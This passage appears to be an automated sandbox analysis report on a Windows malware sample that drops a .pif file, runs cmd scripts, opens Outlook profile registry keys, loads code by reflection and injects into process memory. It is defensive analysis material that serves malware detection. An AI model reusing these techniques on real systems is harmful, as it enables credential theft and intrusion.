            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pif
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\6556.cmd""Jump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\33809.cmd""Jump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess created: C:\Users\user\Links\daphpvwO.pif C:\\Users\\user\\Links\daphpvwO.pifJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: smartscreenps.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??????????.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ???.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: am.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ????.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ???e???????????.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ?.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: ??l.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: tquery.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: spp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: endpointdlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: advapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: sppwmi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: sppcext.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: winscard.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ja811MqV4h.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: ja811MqV4h.exeStatic file information: File size 1624064 > 1048576
            Source: Binary string: easinvoker.pdb source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F320000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: _.pdb source: daphpvwO.pif, 00000005.00000002.3833108807.00000000298E1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832357207.0000000028880000.00000004.08000000.00040000.00000000.sdmp, daphpvwO.pif, 00000005.00000002.3832140039.00000000285C0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 00000005.00000003.1325957813.00000000268F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206D9000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000002.1359167957.00000000206B0000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318791565.0000000000996000.00000004.00000020.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1317716595.000000007F320000.00000004.00001000.00020000.00000000.sdmp, ja811MqV4h.exe, 00000000.00000003.1318791565.00000000009C7000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Users\user\Links\daphpvwO.pifUnpacked PE file: 5.2.daphpvwO.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\Links\daphpvwO.pifUnpacked PE file: 5.2.daphpvwO.pif.400000.1.unpack
            Source: Yara matchFile source: 0.2.ja811MqV4h.exe.29c0000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ja811MqV4h.exe.23c9548.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ja811MqV4h.exe.23c9548.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1326628339.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.2.daphpvwO.pif.298e5570.8.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
            Source: 5.2.daphpvwO.pif.28600ca6.2.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
            Source: 5.2.daphpvwO.pif.28880000.4.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
            Source: daphpvwO.pif.0.drStatic PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3E20 LoadLibraryW,GetProcAddress,WriteProcessMemory,FreeLibrary,0_2_029D3E20
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029E62A4 push 029E630Fh; ret 0_2_029E6307
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C3210 push eax; ret 0_2_029C324C
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029E60AC push 029E6125h; ret 0_2_029E611D
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029DA018 push ecx; mov dword ptr [esp], edx0_2_029DA01D
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D606C push 029D60A4h; ret 0_2_029D609C
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029E61F8 push 029E6288h; ret 0_2_029E6280
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029E6144 push 029E61ECh; ret 0_2_029E61E4
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C617C push 029C61BEh; ret 0_2_029C61B6
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C617A push 029C61BEh; ret 0_2_029C61B6
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CF600 push 029CF64Dh; ret 0_2_029CF645
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CC498 push 029CC61Eh; ret 0_2_029CC616
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CC486 push 029CC61Eh; ret 0_2_029CC616
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CF4F4 push 029CF56Ah; ret 0_2_029CF562
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D2410 push ecx; mov dword ptr [esp], edx0_2_029D2412
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CF5FF push 029CF64Dh; ret 0_2_029CF645
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029E5854 push 029E5A3Ah; ret 0_2_029E5A32
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D2EDC push 029D2F87h; ret 0_2_029D2F7F
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D2EDA push 029D2F87h; ret 0_2_029D2F7F
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CBE18 push ecx; mov dword ptr [esp], edx0_2_029CBE1D
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3F84 push 029D3FBCh; ret 0_2_029D3FB4
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D9FB4 push ecx; mov dword ptr [esp], edx0_2_029D9FB9
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C5D9E push 029C5DFBh; ret 0_2_029C5DF3
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029C5DA0 push 029C5DFBh; ret 0_2_029C5DF3
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029CCDE0 push 029CCE0Ch; ret 0_2_029CCE04
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D3D40 push 029D3D82h; ret 0_2_029D3D7A
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0041C40C push cs; iretd 5_2_0041C4E2
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_00423149 push eax; ret 5_2_00423179
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0041C50E push cs; iretd 5_2_0041C4E2
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_004231C8 push eax; ret 5_2_00423179
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0040E21D push ecx; ret 5_2_0040E230
            Source: C:\Users\user\Links\daphpvwO.pifCode function: 5_2_0041C6BE push ebx; ret 5_2_0041C6BF
            Source: 5.2.daphpvwO.pif.28880ee8.5.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 5.2.daphpvwO.pif.2aec0000.9.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 5.2.daphpvwO.pif.298e6458.7.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 5.3.daphpvwO.pif.268f6d60.0.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 5.2.daphpvwO.pif.2990e990.6.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
            Source: 5.2.daphpvwO.pif.28601b8e.3.raw.unpack, WP6RZJql8gZrNhVA9v.csHigh entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'CHtRxI1vagglf', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\ja811MqV4h.exeFile created: C:\Users\user\Links\daphpvwO.pifJump to dropped file
            Source: C:\Users\user\Desktop\ja811MqV4h.exeFile created: C:\Users\user\Links\daphpvwO.pifJump to dropped file
            Source: C:\Users\user\Desktop\ja811MqV4h.exeCode function: 0_2_029D64E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_029D64E4
            Source: C:\Users\user\Desktop\ja811MqV4h.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
